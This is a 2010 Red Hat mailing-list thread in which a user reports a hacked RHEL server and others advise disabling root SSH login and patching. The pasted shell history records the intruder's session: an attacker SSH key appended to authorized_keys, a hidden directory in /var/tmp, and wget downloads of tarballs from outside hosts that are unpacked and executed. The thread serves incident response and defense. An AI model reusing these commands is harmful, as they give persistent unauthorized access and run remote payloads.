help

Stainforth, Matthew (SD/DS) Matthew.Stainforth at gnb.ca
Thu Jan 28 13:28:46 UTC 2010 

Agreed. 

Also, Never allow root login via ssh.  
Always keep th os up to date with at least security patches.

This should not be news to this audience.


----- Original Message -----
From: redhat-list-bounces at redhat.com <redhat-list-bounces at redhat.com>
To: General Red Hat Linux discussion list <redhat-list at redhat.com>
Sent: Thu Jan 28 08:11:44 2010
Subject: Re: help

Brute force attacks. Leaving root ssh open to the world us begging to  
be owned like this. Always turn that off or use key only auth for root  
on Internet facing boxes.

Sent from my iPhone

On Jan 28, 2010, at 0:33, "Joy Methew" <ml4joy at gmail.com> wrote:

> still i m thinking how he/she got my password??
>
>
> On Thu, Jan 28, 2010 at 11:58 AM, Joy Methew <ml4joy at gmail.com> wrote:
>
>> i have changed my root password
>>
>>
>> On Thu, Jan 28, 2010 at 11:44 AM, Wahyu Darmawan <Wahyu.Darmawan at ag-it.com
>>> wrote:
>>
>>> You may change your root password first, and then you can continue  
>>> to
>>> analyze your system.
>>>
>>> ________________________________________
>>> From: redhat-list-bounces at redhat.com [redhat-list- 
>>> bounces at redhat.com] On
>>> Behalf Of Joy Methew [ml4joy at gmail.com]
>>> Sent: Thursday, January 28, 2010 12:59 PM
>>> To: General Red Hat Linux discussion list
>>> Subject: help
>>>
>>> Hello all,
>>>                   i m using RHEL5.3 as a my mail server with real  
>>> ip.i
>>> configure my system mostly remotely.last login time of my system  
>>> 27 jan
>>> from   this ip 118.129.153.43.
>>> than i try to login at 28 jan in morning so i can`t got  
>>> authentication as
>>> root from my last password.
>>> than i reboot the system reset my password.
>>> i login as a root than i run "last" command i m sending tha first  
>>> 10 lines
>>> of last command...i thinks someone hack my system.i am sending  
>>> history
>>> command output.
>>> now i remove .ssh directory and /var/tmp/*
>>>
>>> please suggest wat is this??
>>>
>>> thanks
>>>
>>> last command out put:
>>> root     pts/1        117.199.118.234  Thu Jan 28 10:58   still  
>>> logged in
>>> root     pts/0        117.199.118.234  Thu Jan 28 10:49   still  
>>> logged in
>>> root     tty1                          Thu Jan 28 10:48 - 10:52   
>>> (00:04)
>>> reboot   system boot  2.6.18-128.el5PA Thu Jan 28 10:45           
>>> (00:25)
>>> root     pts/2        165.red-79-153-1 Thu Jan 28 01:42 - 01:52   
>>> (00:09)
>>> root     pts/2        165.red-79-153-1 Wed Jan 27 23:02 - 01:27   
>>> (02:25)
>>> root     pts/2        165.red-79-153-1 Wed Jan 27 22:33 - 22:34   
>>> (00:00)
>>> root     pts/3        165.red-79-153-1 Wed Jan 27 22:32 - 22:33   
>>> (00:00)
>>> root     pts/2        118.129.153.43   Wed Jan 27 22:31 - 22:32   
>>> (00:01)
>>> root     pts/2        117.199.114.189  Wed Jan 27 15:47 - 15:51   
>>> (00:03)
>>>
>>> What is 165.red-79........this is nt my ip.
>>>
>>>
>>> History Output
>>>
>>> 115  cat /proc/cpuinfo
>>> 116  mkdir .ssh
>>> 117  cd .ssh
>>> 118  echo ssh-rsa
>>>
>>> AAAAB3NzaC1yc2EAAAABJQAAAIBSUxeR1W95aH 
>>> +iJwXRJaswx6YwqqZPk2BBLaGoJR5vnLARZbpMZzxfjo9wwed/FONEcnZFVo0eTkaZ 
>>> +xDaC8eDvT0A4gRC2ahK7sCM17nbRvwGdXPIKismvz6Xqp7mLRf 
>>> +I2jI6xKq8lba96U6uUHtbiaRi814IyJ3Q0It54KBwQ==
>>> rsa-key-20080201 >> ~/.ssh/authorized_keys; chmod 700 ~/.ssh;  
>>> chmod 600
>>> ~/.ssh/authorized_keys
>>> 119  cd /var/tmp
>>> 120  mkdir " "
>>> 121  cd " "
>>> 122  passwd
>>> 123  echo ssh-rsa
>>>
>>> AAAAB3NzaC1yc2EAAAABJQAAAIBSUxeR1W95aH 
>>> +iJwXRJaswx6YwqqZPk2BBLaGoJR5vnLARZbpMZzxfjo9wwed/FONEcnZFVo0eTkaZ 
>>> +xDaC8eDvT0A4gRC2ahK7sCM17nbRvwGdXPIKismvz6Xqp7mLRf 
>>> +I2jI6xKq8lba96U6uUHtbiaRi814IyJ3Q0It54KBwQ==
>>> rsa-key-20080201 >> ~/.ssh/authorized_keys; chmod 700 ~/.ssh;  
>>> chmod 600
>>> ~/.ssh/authorized_keys
>>> 124  ps -x
>>> 125  cd /var/tmp
>>> 126  w
>>> 127  wget http://kok.ucoz.de/gosh.tgz
>>> 128  tar xvf gosh.tgz
>>> 129  cd gosh
>>> 130  chmod +x *
>>> 131  ./go.sh 121
>>> 132  w
>>> 133  ps -x
>>> 134  ps -aux
>>> 135  cd /var/tmp
>>> 136  cd " "
>>> 137  ls -a
>>> 138  wget http://helpbnc.myftp.org/danger/fld.tgz
>>> 139  tar xzvf fld.tgz
>>> 140  cd fld
>>> 141  chmod +x *
>>> 142  nano cyc.acc
>>> 143  nano cyc.acc.1
>>> 144  nano cyc.set
>>> 145  ./httpd
>>> 146  w
>>> --
>>> redhat-list mailing list
>>> unsubscribe mailto:redhat-list-request at redhat.com? 
>>> subject=unsubscribe
>>> https://www.redhat.com/mailman/listinfo/redhat-list
>>>
>>> --
>>> redhat-list mailing list
>>> unsubscribe mailto:redhat-list-request at redhat.com? 
>>> subject=unsubscribe
>>> https://www.redhat.com/mailman/listinfo/redhat-list
>>>
>>
>>
> -- 
> redhat-list mailing list
> unsubscribe mailto:redhat-list-request at redhat.com?subject=unsubscribe
> https://www.redhat.com/mailman/listinfo/redhat-list

-- 
redhat-list mailing list
unsubscribe mailto:redhat-list-request at redhat.com?subject=unsubscribe
https://www.redhat.com/mailman/listinfo/redhat-list

More information about the redhat-list mailing list